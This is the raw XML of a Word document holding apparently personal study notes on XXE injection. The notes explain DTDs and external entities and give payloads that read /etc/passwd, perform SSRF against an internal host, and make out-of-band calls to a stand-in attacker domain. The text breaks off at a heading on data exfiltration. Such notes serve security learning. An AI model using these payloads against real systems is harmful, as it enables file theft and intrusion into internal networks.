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018D" w14:textId="7F788BDB" w:rsidR="00D573F8" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>XML is a language designed for storing and transporting data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9A43F3" w14:textId="2628590A" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tree-like structure of tags and data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74ECA64D" w14:textId="783AF6B0" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>- non-</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>predefined tags</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF27AE9" w14:textId="4D620014" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78BADF64" w14:textId="58A94F16" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>XML document type definition (</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DTD</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>) contains declarations that can define the structure of an XML document, the types of data values it can contain, and other items</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">The DTD is </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>declared within the optional </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DOCTYPE</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> element </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>at the start of the XML document</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DTD can be fully self-contained within the document itself (known as an "</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>internal DTD</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>") or can be loaded from elsewhere (known as an "</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>external DTD</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>") or can be hybrid of the two</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E85B0C7" w14:textId="29DB8C2D" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="502F686B" w14:textId="77777777" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Custom entities</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> defined within DTD: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669D5191" w14:textId="4F92DCDA" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206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&lt;!DOCTYPE foo [ &lt;!ENTITY myentity "my entity value" &gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F91D13" w14:textId="5FC73786" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">=&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>any usage of the entity reference </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206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&amp;myentity;</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> within the XML document will be replaced with the defined value: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206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my entity value</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685ACD68" w14:textId="7E8706AA" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D179994" w14:textId="5628807A" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00500331" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>External entities</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>defined values are loaded from outside of the DTD in which they are declared</w:t>
      </w:r>
      <w:r w:rsidR="00FE53B0" w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206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SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> keyword and must specify a URL from which the value of the entity should be loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E257FE4" w14:textId="2365B75A" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00500331" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206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 xml:space="preserve">&lt;!DOCTYPE foo [ &lt;!ENTITY ext </w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Courier"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
        </w:rPr>
        <w:t>SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206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 xml:space="preserve"> "http://normal-website.com" &gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3E7497" w14:textId="3E8C3F1C" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00500331" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206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&lt;!DOCTYPE foo [ &lt;!ENTITY ext SYSTEM "file:///path/to/file" &gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF32343" w14:textId="77777777" w:rsidR="00500331" w:rsidRPr="00500331" w:rsidRDefault="00500331" w:rsidP="00500331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val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00500331">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="de-DE" w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Exploiting XXE to retrieve files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380CE775" w14:textId="77777777" w:rsidR="00500331" w:rsidRPr="00500331" w:rsidRDefault="00500331" w:rsidP="00500331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eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00500331">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Introduce (or edit) a </w:t>
      </w:r>
      <w:r w:rsidRPr="0050033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DOCTYPE</w:t>
      </w:r>
      <w:r w:rsidRPr="00500331">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t> element that defines an external entity containing the path to the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D2B3EA" w14:textId="2BB01D6B" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00500331" w:rsidP="00A40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333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00500331">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745C672E" w14:textId="1E655010" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00500331" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>suppose a shopping application checks for the stock level of a product by submitting the following XML to the server</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E164AD" w14:textId="77777777" w:rsidR="00500331" w:rsidRPr="00500331" w:rsidRDefault="00500331" w:rsidP="00500331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50033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&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC3193E" w14:textId="1CE03656" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00500331" w:rsidP="00500331">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr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&lt;stockCheck&gt;&lt;productId&gt;381&lt;/productId&gt;&lt;/stockCheck&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2C736A" w14:textId="73E6ECB5" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00500331" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A014793" w14:textId="77777777" w:rsidR="00500331" w:rsidRPr="00500331" w:rsidRDefault="00500331" w:rsidP="00500331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50033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&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E23CC03" w14:textId="77777777" w:rsidR="00500331" w:rsidRPr="00500331" w:rsidRDefault="00500331" w:rsidP="00500331">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00500331">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CAE95E" w14:textId="4E56615C" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00500331" w:rsidP="00500331">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr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&lt;stockCheck&gt;&lt;productId&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>&amp;xxe;</w:t>
      </w:r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&lt;/productId&gt;&lt;/stockCheck&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77642FBF" w14:textId="59889C2F" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68DCA332" w14:textId="100F9424" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00FE53B0" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>- try replacing each input within the XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECFC840" w14:textId="77777777" w:rsidR="00AE4F08" w:rsidRPr="00AE4F08" w:rsidRDefault="00AE4F08" w:rsidP="00AE4F08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AE4F08">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Exploiting XXE to perform SSRF attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBBB6C4" w14:textId="77777777" w:rsidR="00AE4F08" w:rsidRPr="00AE4F08" w:rsidRDefault="00AE4F08" w:rsidP="00AE4F08">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE4F08">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Courier New"/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="single" w:sz="6" w:space="4" w:color="EAEAEA" w:frame="1"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"&gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB203EC" w14:textId="4A59D197" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72CA6EF6" w14:textId="38D89D43" w:rsidR="00AE4F08" w:rsidRPr="00152206" w:rsidRDefault="00AE4F08" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>response is a folder name: use it to drill down until find the information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124A25DF" w14:textId="77777777" w:rsidR="00AE4F08" w:rsidRPr="00AE4F08" w:rsidRDefault="00AE4F08" w:rsidP="00AE4F08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AE4F08">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Detecting blind XXE using out-of-band (</w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00AE4F08">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="16"/>
            <w:szCs w:val="16"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="de-DE"/>
          </w:rPr>
          <w:t>OAST</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AE4F08">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>) techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E44E9A4" w14:textId="3C283925" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00406512" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206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&lt;!DOCTYPE foo [ &lt;!ENTITY xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"&gt; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C0C4FD" w14:textId="0551EF36" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00426555" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3352A12B" w14:textId="4B3EB4B3" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00406512" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Try with XML parameter entities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35995B3C" w14:textId="13F3DE6A" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00406512" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206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&lt;!ENTITY % myparameterentity "my parameter entity value" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6325866B" w14:textId="157E8F04" w:rsidR="00426555" w:rsidRPr="00152206" w:rsidRDefault="00406512" w:rsidP="00A40A64">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00152206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&lt;!DOCTYPE foo [ &lt;!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"&gt; %xxe; ]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAF9396" w14:textId="77777777" w:rsidR="00406512" w:rsidRPr="00406512" w:rsidRDefault="00406512" w:rsidP="00406512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406512">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
        <w:t>Exploiting blind XXE to exfiltrate data out-of-band</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568279AC" w14:textId="7AE5177B" w:rsidR="00924D7D" w:rsidRPr="00152206" w:rsidRDefault="00924D7D" w:rsidP="00406512">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="Times New Roman" w:hAnsi="Courier" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
